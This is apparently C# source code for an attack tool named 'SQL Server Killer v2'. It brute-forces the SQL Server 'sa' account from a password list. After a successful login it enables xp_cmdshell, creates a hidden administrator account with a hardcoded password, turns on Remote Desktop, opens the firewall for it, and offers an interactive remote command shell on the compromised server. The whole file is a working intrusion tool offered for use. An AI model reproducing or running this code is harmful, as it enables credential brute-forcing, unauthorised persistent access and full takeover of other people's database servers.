public void tryConnect(object ipAndPasswordObject)
{
string[] ipAndPassword = (string[])ipAndPasswordObject;
string ip = ipAndPassword[0];
string password = ipAndPassword[1];
string connString = "Data Source=[rxr];uid=sa;pwd=[pxp];";
string newConnString = connString.Replace("[rxr]", ip);
newConnString = newConnString.Replace("[pxp]", password);
try
{
using (SqlConnection conn = new SqlConnection(newConnString))
{
GenericFunctions.logNotification("Trying with username : sa & password : " + password);
conn.Open();
Program.passwords.RemoveRange(0, Program.passwords.Count);
observeResult(true, newConnString);
}
}
catch (Exception ex)
{
}
}
static void Main(string[] args)
{
Console.Title = "SQL Server Killer v2 by rummykhan";
Console.Write("Enter Host IP : ");
string ip = Console.ReadLine();
Console.WriteLine("");
if (GenericFunctions.checkNode(ip))
{
GenericFunctions.logNotification("Host is Live and running SQL Server..");
passwords = GenericFunctions.getPasswordFromFile();
if (passwords != null)
{
if (passwords.Count > 0)
{
GenericFunctions.logNotification("Total passwords loaded are : " + passwords.Count);
List <string> topFewPasswords = new List <string>();
int total = passwords.Count;
int skip = 5;
while (total > 0)
{
int next = total - skip;
if (next >= 5 || total >= 5)
{
total -= skip;
next = skip;
}
else
{
next = total;
total -= next;
}
topFewPasswords = passwords.GetRange(0, next);
passwords.RemoveRange(0, next);
startThreads(ip, topFewPasswords);
}
}
else
{
GenericFunctions.logError("Password File is probably empty..!!");
}
}
}
else
{
GenericFunctions.logError("Host is Dead..!!");
GenericFunctions.logNotification("Press any key to exit..");
Console.ReadKey();
}
}
public void observeResult(bool result, string connString)
{
if (result)
{
GenericFunctions.logSuccess("Finalized Connection String is : " + connString);
Exploit exploit = new Exploit();
GenericFunctions.logNotification("Starting Exploitation.. Devil Mode ON");
GenericFunctions.logNotification("Enabling XP_CMD Shell..");
GenericFunctions.dbResponse(exploit.executeCommand(connString, Exploit.ExploitationCommands[0]));
GenericFunctions.logNotification("Enabling Automation Procedure..");
GenericFunctions.dbResponse(exploit.executeCommand(connString, Exploit.ExploitationCommands[1]));
GenericFunctions.logNotification("Adding user Ch3rn0by1 with password lafangoo..");
GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[2]));
GenericFunctions.logNotification("Adding user Ch3rn0by1 to Admin Group..");
GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[3]));
GenericFunctions.logNotification("Enabling Remote Desktop -- Method # 1..");
GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[4]));
GenericFunctions.logNotification("Enabling Remote Desktop -- Method # 2..");
GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[5]));
GenericFunctions.logNotification("Adding Remote Desktop Port in Firewall -- Method # 1..");
GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[6]));
GenericFunctions.logNotification("Adding Remote Desktop Port in Firewall -- Advance Method..");
GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[7]));
GenericFunctions.logNotification("Configuring Remote Service/Service Manager..");
GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[8]));
GenericFunctions.logNotification("Restarting Service Manager..");
GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, Exploit.ExploitationCommands[9]));
string choice = "x";
while (choice != "c")
{
Console.ForegroundColor = ConsoleColor.White;
Console.Write("Enter CMD Command to Execute on Server\nOR Press c to exit : ");
choice = Console.ReadLine().ToLower();
if (choice != "c")
{
choice = "EXEC master..xp_cmdshell'" + choice + "'";
GenericFunctions.logDataTable(exploit.executeCommandWithOutput(connString, choice));
}
}
GenericFunctions.logNotification("Press any key to exit..");
Console.ReadKey();
}
}